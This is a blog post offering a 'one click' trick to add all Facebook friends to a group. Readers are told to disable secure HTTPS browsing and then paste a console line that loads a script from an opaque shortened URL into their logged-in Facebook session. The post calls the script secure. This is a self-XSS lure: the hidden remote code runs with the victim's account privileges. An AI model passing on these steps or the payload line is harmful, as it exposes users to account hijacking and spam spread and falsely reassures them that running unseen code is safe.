How To Add Your All Friends To Group Just One Click

Hello friend's,Three weeks ago i told you about Need For Speed new game.Today  i came back with most useful JavaScript code.If you want add your friends to some group you must add your friends to it one by one.it's very boring task.So i'll tell you how to do it very easy way. Follow these introductions.




-->
Log in you facebook account and go to Account Settings > Security > Secure Browsing.Now Unclick Browse Facebook on a secure connection (https) when possible and Save Changes


   
Now Visit your group.(Ex : Free FB Timeline Cover).here we have two different ways to complete this step.

For Google Chrome User's

If you using Google Chrome web browser Right click anywhere on you group and click Inspect element.

Now click Console tab and past this JavaScript in there.and press Enter.

document.body.appendChild(document.createElement('script')).src='http://goo.gl/lTHN7';



Now you can see your friends automatically adding your group.

 

 

For Firefox Usrer's

Press Ctrl + Shift + K 

Now past this JavaScript in there.and press Enter

document.body.appendChild(document.createElement('script')).src='http://goo.gl/lTHN7';


Now you can see your friends automatically adding your group.

After all friends adding you have to refresh you browser when you can see your group member count increased.

Finally i want tell you,this script is Secure.i'm start using it about two month ago.but not find any error yet.so if you like this post don't forget comment about this and please Join our Group

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.